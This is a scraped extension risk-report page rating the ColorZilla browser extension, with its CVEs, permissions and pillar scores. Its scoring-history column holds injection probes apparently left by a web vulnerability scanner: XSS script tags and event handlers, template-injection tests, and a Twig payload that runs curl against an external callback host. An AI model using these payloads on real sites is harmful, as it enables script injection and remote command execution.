Netskope Extension Risk

Detail view · rubric v3.6
← Back to catalog

ColorZilla

bhlhnicpbhignbdhedgjhgdocnmhomnp
Risk Score
5.50
Risk Level: Medium
Recommendation: 🚫 BLOCK
Category DeveloperTools
Installs 4,000,000
Rating 4.6
Last updated 2024-05-22 (28 months ago)
Manifest version MV3
CSP present ❌ no
Developer info@colorzilla.com
Verified publisher ❌ no
Featured by Google ✅ yes
Privacy policy link
Web Store open ↗

Top Risks

  • Critical CVE-2021-23358 in bundled underscore@1.8.3 enables arbitrary code execution; not patched to fixed_in 1.12.1.
  • No CSP + underscore (DOM-manipulation lib) with high/critical CVE triggers CVE v2 amplifier (×1.5), CVE pillar=7.5.
  • Privacy policy admits data_collection=true and third_party_sharing=true without scoping to this extension → Privacy pillar=10.
  • scripting + <all_urls> with no CSP allows content injection on every site; new Function() constructor present in injected script.
  • Extension stale 25 months, MV3 but unfixed critical/high CVEs; v2 triple-stale fingerprint (>24mo + CVEs) adds Webstore risk.

Evidence

  • critical_cve_bundled_lib crx underscore@1.8.3 bundles CVE-2021-23358 (critical, ACE); fixed_in 1.12.1 — library not updated.
  • high_cve_bundled_lib crx underscore@1.8.3 also carries CVE-2026-27601 (high, DoS via recursion); fixed_in 1.13.8.
  • no_csp_with_critical_cve crx content_security_policy is null; CVE v2 amplifier ×1.5 applies — underscore is a DOM-manipulation lib.
  • privacy_policy_generic_with_sharing api Policy scope_extension=false, data_collection=true, third_party_sharing=true → v3.5 rule D: +10.0.
  • function_constructor_in_content_script crx new Function() constructor found in js/content-script-combo.js injected on all URLs.
  • stale_extension_with_cves store 25 months since last update; v2 calibration triple-stale (>24mo + CVEs + MV3) adds Webstore +2.0.
  • broad_host_plus_scripting manifest <all_urls> host permission paired with scripting; DeveloperTools discount applied (-1.5).
  • geo_diversity_3_countries crx JS hosts span IN, SG, US (3 countries); below threshold of 4 — no geo-diversity penalty.

CVE Exposures (2)

CVELibrarySeverity Fixed inSummary
CVE-2021-23358 underscore@1.8.3 critical 1.12.1 Arbitrary Code Execution in underscore
CVE-2026-27601 underscore@1.8.3 high 1.13.8 Underscore has unlimited recursion in _.flatten and _.isEqual, potential for DoS

Permissions Breakdown

  • tabs medium Access to tab URLs and metadata; medium risk for a color picker.
  • scripting high Programmatic script injection into pages; elevated with <all_urls>.
  • storage low Local data persistence; standard for storing color history.
  • offscreen low Off-screen document; low risk, used for background rendering.
  • <all_urls> high Broad host access paired with scripting allows injection on every site visited.

Pillar Scores

Permissions6.50
Reputation3.50
Network3.50
Webstore2.50
Maintenance6.00
Privacy10.00
Code Quality6.50
CVE Exposure7.50

Scoring History

fsssiedxn85fe21f1zafdsaxax><!--></ScRiPt>asddn85fe21f1zsssiedx 6.12 High review 2026-09-06
sssiedn5763151bdp727562726963xsx 5.49 Medium review 2026-09-06
sssiedn3f18c2e7dp727562726963xsx 6.38 High block 2026-08-30
"fsssiedxa xx psssiedx 6.34 High review 2026-08-14
%27fsssiedxa sssiedx 5.79 Medium review 2026-08-14
fsssiedxa&#x27;sssiedx 6.33 High review 2026-08-14
%27fsssiedxa$'sssiedx 6.38 High review 2026-08-13
fsssiedxa&#x22;sssiedx 6.45 High review 2026-08-13
v3.6"><script>Ciqy(9009)</script> 6.02 High review 2026-08-05
dfb{{98991*97996}}xca 5.36 Medium review 2026-08-05
<th:t="${dfb}#foreach 5.57 Medium review 2026-08-05
v3.6&n957692=v957765 6.01 High review 2026-08-05
%22fsssiedxa sssiedx 6.45 High block 2026-08-04
%27fsssiedxa$"sssiedx 6.38 High review 2026-08-04
&#x22;fsssiedxa&#x27;sssiedx 5.23 Medium review 2026-08-04
fsssiedxa$'sssiedx 6.58 High block 2026-08-04
v3.6"onmouseover=315c(96782)" 5.99 Medium review 2026-08-04
v3.6&n962177=v916555 5.22 Medium review 2026-08-04
<fsssiedxa"sssiedx 5.36 Medium review 2026-08-03
<fsssiedxa$'sssiedx 6.27 High review 2026-08-03
&#x27;fsssiedxa xx psssiedx 6.27 High block 2026-08-03
&#x27;fsssiedxa sssiedx 6.37 High block 2026-08-03
5.76 Medium review 2026-08-03
$"fsssiedxa 5.23 Medium review 2026-08-03
$"fsssiedxa sssiedx 5.18 Medium review 2026-08-03
fsssiedxa$"sssiedx 6.32 High review 2026-08-03
v3.69199"();}]9523 5.40 Medium review 2026-07-29
dfb[[${98991*97996}]]xca 6.18 High review 2026-07-29
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o") 5.48 Medium review 2026-07-29
<%={{={@{#{${dfb}}%> 5.76 Medium review 2026-07-29
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hithtdjhwfdauc0baf.bxss.me")}} 6.48 High block 2026-07-29
v3.6&n991828=v901020 6.37 High review 2026-07-29
<fsssiedxa'sssiedx 5.74 Medium review 2026-07-28
<fsssiedxa$"sssiedx 5.13 Medium review 2026-07-28
<fsssiedxa xx psssiedx 5.34 Medium review 2026-07-28
<fsssiedxa&#x22;sssiedx 6.48 High block 2026-07-28
<fsssiedxa&#x27;sssiedx 5.18 Medium review 2026-07-28
fsssiedxa<sssiedx 5.09 Medium review 2026-07-28
fsssiedxafdsaxax><!--></ScRiPt>asddsssiedx 5.40 Medium review 2026-07-28
fsssiedxa'sssiedx 6.43 High review 2026-07-28
sssieddrubricxsx 5.49 Medium review 2026-07-28
v3.6 5.50 Medium block 2026-06-16

Bookkeeping

Rubric v3.6
Scored at 2026-06-16 07:20
Listing SHA 5645439d3b49…
Force block — not fired
Score recovered no
Elapsed 30.0s